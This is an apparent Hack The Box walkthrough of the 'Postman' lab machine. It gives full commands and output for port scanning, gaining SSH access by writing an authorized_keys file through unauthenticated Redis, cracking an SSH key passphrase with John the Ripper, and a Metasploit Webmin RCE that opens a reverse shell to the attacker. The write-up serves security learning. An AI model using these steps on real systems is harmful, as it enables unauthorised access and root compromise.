My go-to tools in this phase, which are typically used by many to start enumerating, are:
masscan: very nice port scanning tool that allows finding open ports quickly. To me this is a tool to narrow down the scope of the enumeration so we can focus on open ports only when using nmap.
Here, I am designating the interface to use when communicating to the HTB machine (-e) which will be the HTB VPN interface, along with -p to designate the port range to target but I will target ALL TCP and UDP Ports, and the transmission rate of packets per second (--rate). Similar to this, you could also run something like this:
nmap -p- --min-rate=1000 -T4
nmap: I think most people in the information technology and security space know what nmap does. It is a very versatile Port scanning tool which also allows you to use scripts to further target the services found. Just like anything, it can be a useful tool while it can also be damaging if the user is not careful.
What I typically start with when using nmap is:
-sC: to use all default non-intrusive nmap scripts on each service
-sV: to get the service version information which is definitely important for us
-p: to designate the port we will be targeting
-vvvv: for extended verbosity (as I like as many details as I can get)
MASSCAN/NMAP
root@kali:~/Documents/HTB-Labs/Postman# masscan -e tun1 -p1-65535,U:1-65535 10.10.10.160 --rate=1000
Starting masscan 1.0.5 (http://bit.ly/14GZzcT) at 2020-01-07 15:52:46 GMT
-- forced options: -sS -Pn -n --randomize-hosts -v --send-eth
Initiating SYN Stealth Scan
Scanning 1 hosts [131070 ports/host]
Discovered open port 10000/tcp on 10.10.10.160
Discovered open port 22/tcp on 10.10.10.160
Discovered open port 10000/udp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
^Cwaiting several seconds to exit...
root@kali:~/Documents/HTB-Labs/Postman# nmap -sC -sV -p22,80,6379,10000 -vvvv postman.htb
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-07 11:08 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:08, 0.00s elapsed
Initiating Ping Scan at 11:08
Scanning postman.htb (10.10.10.160) [4 ports]
Completed Ping Scan at 11:08, 0.29s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 11:08
Scanning postman.htb (10.10.10.160) [4 ports]
Discovered open port 22/tcp on 10.10.10.160
Discovered open port 6379/tcp on 10.10.10.160
Discovered open port 80/tcp on 10.10.10.160
Discovered open port 10000/tcp on 10.10.10.160
Completed SYN Stealth Scan at 11:08, 0.17s elapsed (4 total ports)
Initiating Service scan at 11:08
Scanning 4 services on postman.htb (10.10.10.160)
Completed Service scan at 11:08, 6.37s elapsed (4 services on 1 host)
Initiating OS detection (try #1) against postman.htb (10.10.10.160)
Retrying OS detection (try #2) against postman.htb (10.10.10.160)
Initiating Traceroute at 11:08
Completed Traceroute at 11:08, 0.28s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 11:08
Completed Parallel DNS resolution of 2 hosts. at 11:08, 0.03s elapsed
DNS resolution of 1 IPs took 0.03s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0]
NSE: Script scanning 10.10.10.160.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:08
Completed NSE at 11:09, 30.29s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.83s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Nmap scan report for postman.htb (10.10.10.160)
Host is up, received reset ttl 63 (0.16s latency).
Scanned at 2020-01-07 11:08:30 EST for 44s
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 63 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 46:83:4f:f1:38:61:c0:1c:74:cb:b5:d1:4a:68:4d:77 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDem1MnCQG+yciWyLak5YeSzxh4HxjCgxKVfNc1LN+vE1OecEx+cu0bTD5xdQJmyKEkpZ+AVjhQo/esF09a94eMNKcp+bhK1g3wqzLyr6kwE0wTncuKD2bA9LCKOcM6W5GpHKUywB5A/TMPJ7UXeygHseFUZEa+yAYlhFKTt6QTmkLs64sqCna+D/cvtKaB4O9C+DNv5/W66caIaS/B/lPeqLiRoX1ad/GMacLFzqCwgaYeZ9YBnwIstsDcvK9+kCaUE7g2vdQ7JtnX0+kVlIXRi0WXta+BhWuGFWtOV0NYM9IDRkGjSXA4qOyUOBklwvienPt1x2jBrjV8v3p78Tzz
| 256 2d:8d:27:d2:df:15:1a:31:53:05:fb:ff:f0:62:26:89 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBIRgCn2sRihplwq7a2XuFsHzC9hW+qA/QsZif9QKAEBiUK6jv/B+UxDiPJiQp3KZ3tX6Arff/FC0NXK27c3EppI=
| 256 ca:7c:82:aa:5a:d3:72:ca:8b:8a:38:3a:80:41:a0:45 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIF3FKsLVdJ5BN8bLpf80Gw89+4wUslxhI3wYfnS+53Xd
80/tcp open http syn-ack ttl 63 Apache httpd 2.4.29 ((Ubuntu))
|_http-favicon: Unknown favicon MD5: E234E3E8040EFB1ACD7028330A956EBF
| http-methods:
|_ Supported Methods: GET POST OPTIONS HEAD
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: The Cyber Geek's Personal Website
6379/tcp open redis syn-ack ttl 63 Redis key-value store 4.0.9
10000/tcp open http syn-ack ttl 63 MiniServ 1.910 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 91549383E709F4F1DD6C8DAB07890301
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Linux 3.2 - 4.9 (95%), Linux 3.1 (95%), Linux 3.2 (95%), AXIS 210A or 211 Network Camera (Linux 2.6.17) (94%), Linux 3.16 (93%), Linux 3.18 (93%), ASUS RT-N56U WAP (Linux 3.4) (93%), Oracle VM Server 3.4.2 (Linux 4.1) (93%), Android 4.1.1 (93%), Android 4.2.2 (Linux 3.4) (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.80%E=4%D=1/7%OT=22%CT=%CU=40752%PV=Y%DS=2%DC=T%G=N%TM=5E14AD2A%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)
OPS(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11NW7%O6=M54DST11)
WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)
ECN(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)
T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=40%CD=S)
Uptime guess: 10.801 days (since Fri Dec 27 15:55:33 2019)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=259 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using port 443/tcp)
HOP RTT ADDRESS
1 199.29 ms 10.10.14.1
2 199.93 ms postman.htb (10.10.10.160)
NSE: Script Post-scanning.
NSE: Starting runlevel 1 (of 3) scan.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
NSE: Starting runlevel 2 (of 3) scan.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
NSE: Starting runlevel 3 (of 3) scan.
Initiating NSE at 11:09
Completed NSE at 11:09, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.51 seconds
Raw packets sent: 63 (4.368KB) | Rcvd: 45 (3.240KB)
Through nmap we found 4 services available; TCP22 (SSH), TCP80 (HTTP running on an Apache Webserver), TCP6379 (Redis Server), and TCP10000 (Webmin Server).
A couple of take-offs from this finding is:
Attacking SSH directly as a first step will be a waste of time and hard to get anywhere.
We can attempt to start with HTTP and see what is there as apparently there is a site using the http-title "The Cyber Geek's Personal Website".
Redis Server is available (TCP6379) which is a key-value in-memory data structure/database server. Just like anything in this field, if it's not properly setup, it could allow an attacker get access to the system or information hosted. An important aspect of this service is that it seems to be running on version 4.0.9.
Webmin available on its default port TCP10000. This web application allows easy linux system management through a web interface. Just like applications handling sensitive information or handling system resources, it prompts for authentication through an encrypted HTTP service so you can access the appliction. The version currently used here is 1.910.
We can use the information from these two services (Redis and Webmin) to find if there are exploits available or simply documented flaws.
Below, we used dirb on the HTTP service simply to find if there is any web page or directory available on HTTP.
DIRB
root@kali:~/Documents/HTB-Labs/Postman# dirb http://postman.htb /usr/share/wordlists/dirb/common.txt
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Tue Jan 7 11:19:18 2020
URL_BASE: http://postman.htb/
WORDLIST_FILES: /usr/share/wordlists/dirb/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: http://postman.htb/ ----
==> DIRECTORY: http://postman.htb/css/
==> DIRECTORY: http://postman.htb/fonts/
==> DIRECTORY: http://postman.htb/images/
+ http://postman.htb/index.html (CODE:200|SIZE:3844)
==> DIRECTORY: http://postman.htb/js/
+ http://postman.htb/server-status (CODE:403|SIZE:299)
==> DIRECTORY: http://postman.htb/upload/
---- Entering directory: http://postman.htb/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://postman.htb/fonts/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://postman.htb/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://postman.htb/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: http://postman.htb/upload/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Tue Jan 7 11:34:19 2020
DOWNLOADED: 4612 - FOUND: 2
As we only found index.html and not much is there we can move to another service.
Another one to point out is and as mentioned earlier, you need credentials to access Webmin and it seems to be vulnerable to an unauthenticated RCE (CVE-2019-15107) reintroduced on releases 1.900 through 1.920 through the password_change.cgi page but it seems to be restricted as it can be locked down.
Also, it seems to be vulnerable to another RCE through the Package Updates functionality (CVE-2019-12840) which allows any authorized user to the 'Package Updates' module to execute commands with root privileges, which means it will let us escalate privileges. This last one is also restricted as you would have to be authenticated, and we found that this exploit has a Metasploit module that we can use.
Exploitation and Gaining Access
Exploiting an unauthenticated RCE vulnerability in Redis:
If I remember correctly, this flaw is something that could be configured to prevent it from happening, and along with this, you always have to make sure any service you configure does NOT allow anonymous authentication like FTP allows if not configured properly.
To interact with Redis, we need to install or have available redis-cli. Let's first create a SSH public/private key pairs for the redis user under postman.htb host.
root@kali:~/Documents/HTB-Labs/Postman# ssh-keygen -t rsa -b 4096 -C "redis@postman.htb"
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa): ./id_rsa
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in ./id_rsa.
Your public key has been saved in ./id_rsa.pub.
The key fingerprint is:
SHA256:JzR/c/6ghZ32fkfbdeYNPrmLTJ/MAMSux+ODyP8PFsQ redis@postman.htb
The key's randomart image is:
+---[RSA 4096]----+
| |
| o |
| o E |
| . * |
| S * o . |
| = + *..=|
| . ...* +.B**|
| o .+.= X+**|
| ...oo= B=*|
+----[SHA256]-----+
root@kali:~/Documents/HTB-Labs/Postman# (echo -e "\n\n"; cat id_rsa.pub; echo -e "\n\n") > temp.txt
Now that we had created the SSH key pair and saved the Public Key to temp.txt, let's try to interact with Redis and upload temp.txt as a configuration file of Redis. Something to mention is that at this point we already attempted to access Redis anonymously and complete successful.
root@kali:~/Documents/HTB-Labs/Postman# cat temp.txt | redis-cli -h postman.htb -x set s-key
OK
root@kali:~/Documents/HTB-Labs/Postman# redis-cli -h postman.htb
postman.htb:6379> config get dir
1) "dir"
2) "/var/lib/redis"
postman.htb:6379> config set dir /var/lib/redis/.ssh
OK
postman.htb:6379> config set dbfilename authorized_keys
OK
postman.htb:6379> save
OK
postman.htb:6379> quit
As we were successful at uploading temp.txt, let's try to authenticate through SSH using the private key we created.
root@kali:~/Documents/HTB-Labs/Postman# ssh -i id_rsa redis@postman.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Last login: Mon Aug 26 03:04:25 2019 from 10.10.10.1
redis@Postman:~$ id
uid=107(redis) gid=114(redis) groups=114(redis)
redis@Postman:~$
AND we have access to the system as the redis user (shown above). After doing some further enumeration, we found there is another user account in this system, Matt, and also a "backup" SSH private key which probably belongs to this user as there is no other account that can run a shell or is allowed to login. Let's take a look at this private key and copy it to our system.
As we copied the private to our system we can try to use it.
root@kali:~/Documents/HTB-Labs/Postman# ssh -i matt_id_rsa matt@postman.htb
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'matt_id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "matt_id_rsa": bad permissions
matt@postman.htb's password:
OOPS! Basically, not only we missed to set the proper permissions on the private key from the user found (Matt), but also this private key has a passphrase we need to crack, in this case using John the Ripper with rockyou.txt wordlist. Let do this!
Before running the private key through JtR, we need to convert it from SSH to JtR format. Then we can run it against JtR.
JTR
root@kali:~/Documents/HTB-Labs/Postman# ssh2john matt_id_rsa > matt_hash
root@kali:~/Documents/HTB-Labs/Postman# john --wordlist=/usr/share/wordlists/rockyou.txt matt_hash > matt_hash_decoded
Using default input encoding: UTF-8
Will run 2 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
1g 0:00:00:13 DONE (2020-01-06 23:58) 0.07633g/s 1094Kp/s 1094Kc/s 1094KC/sa6_123..*7¡Vamos!
Session completed
root@kali:~/Documents/HTB-Labs/Postman# cat matt_hash_decoded
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 1 for all loaded hashes
Cost 2 (iteration count) is 2 for all loaded hashes
computer2008 (matt_id_rsa)
The passphrase has been cracked (computer2008), let's proceed with SSH.
root@kali:~/Documents/HTB-Labs/Postman# ssh -i matt_id_rsa matt@postman.htb
Enter passphrase for key 'matt_id_rsa':
Connection closed by 10.10.10.160 port 22
root@kali:~/Documents/HTB-Labs/Postman# ssh -i id_rsa redis@postman.htb
Welcome to Ubuntu 18.04.3 LTS (GNU/Linux 4.15.0-58-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Tue Jan 7 04:43:59 2020 from 10.10.14.28
redis@Postman:~$ su - Matt
Password:
Matt@Postman:~$ pwd
/home/Matt
Matt@Postman:~$ id
uid=1000(Matt) gid=1000(Matt) groups=1000(Matt)
Matt@Postman:~$ cat user.txt
517ad0*********************a2f3c
Matt@Postman:~$
**AND BOOM!! Not only we were successful at accessing the system as Matt, but we also found the user flag (obviously masked)!
Privilege Escalation
Something to mention here before we start is that before moving forward we attempted to use the private key passphrase as Matt's password in Webmin successfully, which means the passphrase is also Matt's password on the system (something is commonly done and technically defeats the purpose of using private keys to authenticate through SSH.
This same password will be used when exploiting the 'Package Updates RCE' vulnerability (CVE-2019-12840) through the Metasploit module.
I am breaking the output here simply to explain that we are basically setting up the options that will be used by the exploit we will be using after calling it (in simpler terms).
msf5 > use exploit/linux/http/webmin_packageup_rce
msf5 exploit(linux/http/webmin_packageup_rce) > set RHOSTS 10.10.10.160
RHOSTS => 10.10.10.160
msf5 exploit(linux/http/webmin_packageup_rce) > set TARGETURI /
TARGETURI => /
msf5 exploit(linux/http/webmin_packageup_rce) > set TARGET 0
TARGET => 0
msf5 exploit(linux/http/webmin_packageup_rce) > set PASSWORD computer2008
PASSWORD => computer2008
msf5 exploit(linux/http/webmin_packageup_rce) > set LHOST 10.10.14.28
LHOST => 10.10.14.28
msf5 exploit(linux/http/webmin_packageup_rce) > set USERNAME Matt
USERNAME => Matt
msf5 exploit(linux/http/webmin_packageup_rce) > set LPORT 26446
LPORT => 26446
[-] The value specified for PAYLOAD is not valid.
msf5 exploit(linux/http/webmin_packageup_rce) > set RPORT 80
RPORT => 80
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL 0
SSL => 0
Now, let's show the options setup and try to run it (we need to catch a mistake done on purpose).
msf5 exploit(linux/http/webmin_packageup_rce) > show options
Module options (exploit/linux/http/webmin_packageup_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD computer2008 yes Webmin Password
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOSTS 10.10.10.160 yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 80 yes The target port (TCP)
SSL 0 no Negotiate SSL/TLS for outgoing connections
TARGETURI / yes Base path for Webmin application
USERNAME Matt yes Webmin Username
VHOST no HTTP server virtual host
Payload options (cmd/unix/reverse_perl):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 10.10.14.28 yes The listen address (an interface may be specified)
LPORT 26446 yes The listen port
Exploit target:
Id Name
-- ----
0 Webmin <= 1.910
One mistake was caught, we forgot to setup the SSL option; remember we mentioned Webmin uses HTTPS.
msf5 exploit(linux/http/webmin_packageup_rce) > set SSL 1
SSL => 1
msf5 exploit(linux/http/webmin_packageup_rce) > run -j
[*] Exploit running as background job 18.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.28:26446
[-] Exploit failed [unreachable]: OpenSSL::SSL::SSLError SSL_connect returned=1 errno=0 state=error: wrong version number
Another error here: Webmin does NOT run on TCP80 and its default port is TCP10000. We need to keep this in mind.
msf5 exploit(linux/http/webmin_packageup_rce) > set rport 10000
rport => 10000
msf5 exploit(linux/http/webmin_packageup_rce) > exploit -j
[*] Exploit running as background job 19.
[*] Exploit completed, but no session was created.
[*] Started reverse TCP handler on 10.10.14.28:26446
[+] Session cookie: ee591b8b1c14c1aea3d1819d7c5e2064
[*] Attempting to execute the payload...
[*] Command shell session 1 opened (10.10.14.28:26446 -> 10.10.10.160:45702) at 2020-01-07 00:08:43 -0500
And we now have a Shell Session created on postman.htb. Let's interact with it and see where are located, the user this shell is running as (should be root per the vulnerability) and let's try and get that Root Flag.
PS: This whole write-up looks straight forward but something to keep in mind is we are not perfect AND along the way while learning, we can make mistakes or end up going down rabbitholes. Be patient and try not to get frustrated and if you do, step out for a little bit. Go to the forum, go to Discord, contact other members that had rooted or completed the boxes. There is a lot of people wiliing to help.
Also, on the final phase, we used Metasploit, but keep in mind you cannot always rely on Metasploit. Force yourself in using other tools.
If you enjoyed my Walkthrough, thought it was useful AND you are a member of Hack The Box, feel free throw a 'Respect'. Thanks!
As explained on we can attempt to exploit a vulnerability in Redis were you can push a SSH Public Key (authorized_key) as the Redis configuration. In some instances, Redis could be running as the root user, but in others, just like some services (Apache for example), it could be running with its own service account, typically redis would be the username.
